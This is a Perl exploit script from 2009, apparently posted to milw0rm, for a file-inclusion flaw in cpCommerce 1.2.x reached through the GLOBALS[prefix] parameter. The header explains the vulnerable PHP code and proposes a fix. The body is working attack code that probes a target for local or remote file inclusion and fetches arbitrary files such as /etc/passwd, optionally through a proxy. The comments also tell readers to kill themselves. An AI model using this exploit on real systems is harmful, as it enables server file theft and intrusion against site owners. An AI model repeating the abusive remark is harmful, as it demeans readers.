220 lines
No EOL
6.9 KiB
Perl
Executable file
220 lines
No EOL
6.9 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
# cpCommerce 1.2.x GLOBALS[prefix] Arbitrary File Inclusion Exploit
|
|
#
|
|
# by staker
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
# mail: staker[at]hotmail[dot]it
|
|
# url: http://cpcommerce.cpradio.org
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
#
|
|
# it works with register_globals=on
|
|
# if you wanna carry out a LFI -> mq=off
|
|
#
|
|
# short explanation:
|
|
#
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
# cpCommerce contains one flaw that allows an
|
|
# attacker to include a remote or local file
|
|
# because of require_once() in _functions.php
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
# File _functions.php
|
|
#
|
|
# [begin block code]
|
|
# ------------------
|
|
#
|
|
# define("CPCOMMERCE_LOADED", true);
|
|
# ini_set("register_globals",0); <------ {1} totally useless
|
|
# error_reporting(E_ALL ^ E_NOTICE);
|
|
#
|
|
# // Older PHP Versions
|
|
# if (phpversion() < "4.0.6" && isset($HTTP_POST_VARS))
|
|
# $_POST = ($HTTP_POST_VARS);
|
|
# if (phpversion() < "4.0.6" && isset($HTTP_GET_VARS))
|
|
# $_GET = ($HTTP_GET_VARS);
|
|
# if (phpversion() < "4.0.6" && isset($HTTP_COOKIE_VARS))
|
|
# $_COOKIE = ($HTTP_COOKIE_VARS);
|
|
# if (phpversion() < "4.0.6" && isset($HTTP_SERVER_VARS))
|
|
# $_SERVER = ($HTTP_SERVER_VARS);
|
|
# if (phpversion() < "4.0.6" && isset($HTTP_POST_FILES))
|
|
# $_FILES = ($HTTP_POST_FILES);
|
|
# if (phpversion() < "4.0.6" && isset($HTTP_SESSION_VARS))
|
|
# $_SESSION = ($HTTP_SESSION_VARS);
|
|
#
|
|
# // Start MySQL and Sessions
|
|
# session_start();
|
|
#
|
|
# // Resolve PHP running under fcgi
|
|
# if (empty($_SERVER['PHP_SELF']))
|
|
# $_SERVER['PHP_SELF'] = $_SERVER['SCRIPT_NAME'];
|
|
#
|
|
# ## Protect prefix vulnerability
|
|
# if (strpos($_SERVER['PHP_SELF'],"_functions.php") !== false)
|
|
# header("Location: {$_SERVER['HTTP_HOST']}"); <------ {2} exit or die function?
|
|
# if (!isset($prefix) || isset($_REQUEST['prefix'])) $prefix = ""; <--- {3} this is interesting
|
|
#
|
|
# ## Include Configuration Files
|
|
# require_once("{$prefix}_config.php"); <-------- {4} include $prefix variable + _config.php
|
|
#
|
|
# ----------------
|
|
# [end block code]
|
|
#
|
|
# Explanation (code snippet above [points])
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
# 1. actually ini_set() doesn't work..so doesn't change anything
|
|
# 2. header() needs an exit or die function otherwise is useless
|
|
# 2. because of header() without die we bypass the direct access
|
|
# 3. all REQUEST variables are not allowed,what about GLOBALS[]?
|
|
# 4. require_once() include $prefix variable.
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
#
|
|
# It's not possible to include a remote/local file using a web
|
|
# browser because you will be automatically redirected in another
|
|
# page ($_SERVER['HTTP_HOST']). What about scripts or curl? yeah
|
|
#
|
|
# http://[target]/[path]/_functions.php?GLOBALS[prefix]=[FILE]
|
|
#
|
|
# Various:
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
# They didn't help me but i wanna give a thanks to girex,str0ke
|
|
# Gianluka_95,p3ri0d,mrdoktom,Aquilo & http://zeroidentity.org
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
# Don't contact me on messenger,i'm bored of stupid questions!
|
|
# so if you wanna help about exploit usage. kill yourself ok?
|
|
# I didn't contact anyone to fix this bug, at least not yet,
|
|
# but i release a possible fix here:
|
|
#
|
|
# _functions.php line: 36 Replace it with the following code:
|
|
#
|
|
# die(header("Location: http://{$_SERVER['HTTP_HOST']}"));
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
# Today is: 23 May 2009.
|
|
# Location: Italy,Turin.
|
|
# http://www.youtube.com/watch?v=TmFi2snLr7o
|
|
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
use LWP::UserAgent;
|
|
|
|
|
|
print "[*--------------------------------------------------------------*]\n".
|
|
"[* cpCommerce 1.2.x GLOBALS[prefix] Arbitrary Inclusion Exploit *]\n".
|
|
"[*--------------------------------------------------------------*]\n".
|
|
"[* Usage: ./cpCommerce.pl [target]/[path] [filename] [proxy] *]\n".
|
|
"[* [filename] such as /etc/passwd or http://milw0rm.com *]\n".
|
|
"[* [proxy] is optional ex: 151.21.42.10:8080 *]\n".
|
|
"[*--------------------------------------------------------------*]\n";
|
|
|
|
|
|
die "Example: localhost/cpcommerce /etc/passwd\n" unless @ARGV;
|
|
|
|
my $host = $ARGV[0];
|
|
my $type = $ARGV[1];
|
|
|
|
my $expl = new cpCommerce;
|
|
|
|
print $expl->vulnerable($host);
|
|
print $expl->local_file($host,$type);
|
|
|
|
|
|
|
|
package cpCommerce;
|
|
|
|
sub new
|
|
{
|
|
my $class = shift;
|
|
my $self = {};
|
|
|
|
$self->{vulnerable} = undef;
|
|
$self->{parse_url} = undef;
|
|
$self->{local_file} = undef;
|
|
|
|
bless($self,$class);
|
|
|
|
return $self;
|
|
}
|
|
|
|
|
|
|
|
sub vulnerable
|
|
{
|
|
my ($class,$host) = @_;
|
|
|
|
my $www = new LWP::UserAgent(
|
|
max_redirect => 0,
|
|
agent => 'ELinks/0.9.3 (textmode; Linux 2.6.11 i686; 79x24)',
|
|
) || die $!;
|
|
|
|
if ($ARGV[2] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
|
|
$www->proxy(['http', 'ftp'], $class->parse_url($ARGV[2]));
|
|
}
|
|
|
|
$host = $class->parse_url($host);
|
|
|
|
my $exter = $www->get($host.'/_functions.php?GLOBALS[prefix]=http://');
|
|
my $local = $www->get($host.'/_functions.php?GLOBALS[prefix]=%00');
|
|
my @check = ();
|
|
|
|
push(@check,'LFI') unless $local->content =~ /0_config.php'/i;
|
|
push(@check,'RFI') unless $exter->content =~ /URL file-access is disabled/i;
|
|
|
|
if (scalar(@check) == 0) {
|
|
return "Site not vulnerable because of php.ini settings.\n";
|
|
}
|
|
else {
|
|
return "Vulnerable to: ${check[0]} ${check[1]}\n";
|
|
}
|
|
}
|
|
|
|
|
|
sub local_file
|
|
{
|
|
my ($class,$host,$file) = @_;
|
|
|
|
my $www = new LWP::UserAgent(
|
|
max_redirect => 0,
|
|
agent => 'Lynxy/6.6.6dev.8 libwww-FM/3.14159FM',
|
|
) || die $!;
|
|
|
|
if ($ARGV[2] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
|
|
$www->proxy(['http', 'ftp'], $class->parse_url($ARGV[2]));
|
|
}
|
|
|
|
$host = $class->parse_url($host);
|
|
|
|
my $request = $www->get($host.'/_functions.php?GLOBALS[prefix]='.$file.'%00');
|
|
my $result;
|
|
|
|
if ($request->status_line =~ /^302|200|301/ || $request->is_success)
|
|
{
|
|
if ($request->content =~ /Failed opening/i) {
|
|
return "Exploit failed.\n";
|
|
}
|
|
else {
|
|
my @result = split /No database selected/,$request->content;
|
|
return $result[0];
|
|
}
|
|
}
|
|
else
|
|
{
|
|
if ($request->as_string !~ /(ecommerce|oscommerce)/i) {
|
|
return "cpCommerce not found\n";
|
|
}
|
|
else {
|
|
$request->as_string;
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
sub parse_url
|
|
{
|
|
my ($class,$string) = @_;
|
|
|
|
if ($string !~ /^http:\/\/?/i) {
|
|
$string = 'http://'.$string;
|
|
}
|
|
|
|
return $string;
|
|
}
|
|
|
|
# milw0rm.com [2009-05-26] |